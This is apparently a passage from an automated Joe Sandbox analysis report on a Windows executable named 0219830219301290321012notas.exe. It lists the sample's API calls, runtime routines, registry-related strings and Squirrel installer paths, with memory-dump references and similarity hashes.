                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C63
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C75
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C87
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C99
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236CAB
                                                                    • _free.LIBCMT ref: 00237088
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 002370AA
                                                                    • _free.LIBCMT ref: 002370BF
                                                                    • _free.LIBCMT ref: 002370CA
                                                                    • _free.LIBCMT ref: 002370EC
                                                                    • _free.LIBCMT ref: 002370FF
                                                                    • _free.LIBCMT ref: 0023710D
                                                                    • _free.LIBCMT ref: 00237118
                                                                    • _free.LIBCMT ref: 00237150
                                                                    • _free.LIBCMT ref: 00237157
                                                                    • _free.LIBCMT ref: 00237174
                                                                    • _free.LIBCMT ref: 0023718C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00229572
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000060,002472B0,Module,?), ref: 002295BD
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 002295D3
                                                                    • FindResourceW.KERNEL32(00000000,?,?), ref: 002295FE
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00229616
                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00229628
                                                                      • Part of subcall function 00221C76: GetLastError.KERNEL32(002214AE), ref: 00221C76
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002296EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    • API String ID: 1818814483-549000027
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00228070
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00228145
                                                                    • EnterCriticalSection.KERNEL32(00000011,?,?,?,?,?,002296E7,00000000,?), ref: 00228281
                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,002296E7,00000000,?), ref: 0022829D
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,002296E7,00000000,?), ref: 002282C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterH_prolog3_Leave_wcsstrlstrcmpi
                                                                    • String ID: }}$%$'$HKCR$HKCU{Software{Classes
                                                                    • API String ID: 2331752857-792530599
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(DeploymentTool.exe,?,00000000), ref: 00222659
                                                                    • lstrlenW.KERNEL32(00245110,?,?,00000000), ref: 0022266C
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00222692
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002226A7
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002226B6
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022275D
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002227DE
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 002227F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsstrlstrlen
                                                                    • String ID: DeploymentTool.exe
                                                                    • API String ID: 4267858634-1188192670
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 002330CE
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 002330DA
                                                                    • _free.LIBCMT ref: 002330E5
                                                                    • _free.LIBCMT ref: 002330F0
                                                                    • _free.LIBCMT ref: 002330FB
                                                                    • _free.LIBCMT ref: 00233106
                                                                    • _free.LIBCMT ref: 00233111
                                                                    • _free.LIBCMT ref: 0023311C
                                                                    • _free.LIBCMT ref: 00233127
                                                                    • _free.LIBCMT ref: 00233135
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free_wcschr
                                                                    • String ID:
                                                                    • API String ID: 3422831350-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 00225FB9
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00226032
                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00226071
                                                                    • CloseHandle.KERNEL32(?), ref: 00226082
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeWrite
                                                                    • String ID: %s%s$%s%s%s$:
                                                                    • API String ID: 3229859547-3034790606
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226852
                                                                    • GetLastError.KERNEL32 ref: 00226860
                                                                    • CreateDirectoryW.KERNEL32(?), ref: 0022696A
                                                                    • GetLastError.KERNEL32 ref: 00226978
                                                                    • FreeResource.KERNEL32(?,Failed to extract installer), ref: 00226DF2
                                                                    Strings
                                                                    • \SquirrelTemp, xrefs: 00226831
                                                                    • Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00226878, 00226990
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast$FreeResource
                                                                    • String ID: Unable to write to %s - IT policies may be restricting access to this folder$\SquirrelTemp
                                                                    • API String ID: 2750073017-3128572547
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C22B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0022C233
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C2C1
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0022C2EC
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0022C341
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00236D1D: _free.LIBCMT ref: 00236D42
                                                                    • _free.LIBCMT ref: 00236DA3
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00236DAE
                                                                    • _free.LIBCMT ref: 00236DB9
                                                                    • _free.LIBCMT ref: 00236E0D
                                                                    • _free.LIBCMT ref: 00236E18
                                                                    • _free.LIBCMT ref: 00236E23
                                                                    • _free.LIBCMT ref: 00236E2E
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32 ref: 00239D2D
                                                                    • __fassign.LIBCMT ref: 00239F0C
                                                                    • __fassign.LIBCMT ref: 00239F29
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00239F71
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00239FB1
                                                                    • GetLastError.KERNEL32 ref: 0023A05D
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0022C4A3,0022B3E4), ref: 0022C4BA
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022C4C8
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022C4E1
                                                                    • SetLastError.KERNEL32(00000000,?,0022C4A3,0022B3E4), ref: 0022C533
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00221BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BE2
                                                                      • Part of subcall function 00221BDC: GetLastError.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BEC
                                                                    • GetModuleFileNameW.KERNEL32(00220000,?,00000104), ref: 00227A4C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00227AA0
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    • API String ID: 3798416324-549000027
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00221E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00221195), ref: 00221DAE
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00221DBE
                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00020019,00000000,80000002,00221195,?,?,?,00221E33,00000000,00020019,?,?,00000000), ref: 00221DEE
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                    • API String ID: 1337834000-3913318428
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,00000001,?,?,00221816,00000000), ref: 00221A5D
                                                                    • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00221A6F
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00221816,00000000), ref: 00221A86
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: TaskDialogIndirect$comctl32.dll
                                                                    • API String ID: 145871493-2809879075
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,002315BB,?,?,00231583,?,?,?), ref: 002315DB
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002315EE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,002315BB,?,?,00231583,?,?,?), ref: 00231611
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00231DA1
                                                                    • _free.LIBCMT ref: 00231DC1
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E22
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E34
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: __crt_fast_encode_pointer$_free
                                                                    • String ID:
                                                                    • API String ID: 366466260-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00236CCC
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00236CDE
                                                                    • _free.LIBCMT ref: 00236CF0
                                                                    • _free.LIBCMT ref: 00236D02
                                                                    • _free.LIBCMT ref: 00236D14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                    • API String ID: 0-1787834505
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 002283CC
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 002283DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                    • API String ID: 1646373207-2994018265
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,0022182D,00000000), ref: 0022190C
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,0022182D,00000000), ref: 00221913
                                                                    • CloseHandle.KERNEL32(?), ref: 00221950
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpenToken
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 4052875653-3733053543
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00228AEA,?,?,?,?), ref: 00228BCE
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00228BDE
                                                                      • Part of subcall function 00228B55: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00228BBE,?,?,00000000,?,00228AEA,?,?,?,?), ref: 00228B67
                                                                      • Part of subcall function 00228B55: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00228B77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                    • API String ID: 1646373207-2191092095
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00228BBE,?,?,00000000,?,00228AEA,?,?,?,?), ref: 00228B67
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00228B77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                    • API String ID: 1646373207-2168864297
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002223E3
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000820), ref: 002223EB
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002223FE
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0022242D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Module$FileH_prolog3_HandleName_wcsrchr
                                                                    • String ID:
                                                                    • API String ID: 3248668939-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,0022179A,?,0022EBD7,0022179A,00000000,?,?,0022EC92,E9800040,00000000,?), ref: 002331D7
                                                                    • _free.LIBCMT ref: 00233234
                                                                    • _free.LIBCMT ref: 0023326A
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0022EC92,E9800040,00000000,?), ref: 00233275
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00222373
                                                                    • VerSetConditionMask.KERNEL32(00000000), ref: 00222377
                                                                    • VerSetConditionMask.KERNEL32(00000000), ref: 0022237B
                                                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0022239E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$InfoVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 2793162063-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0022C77E
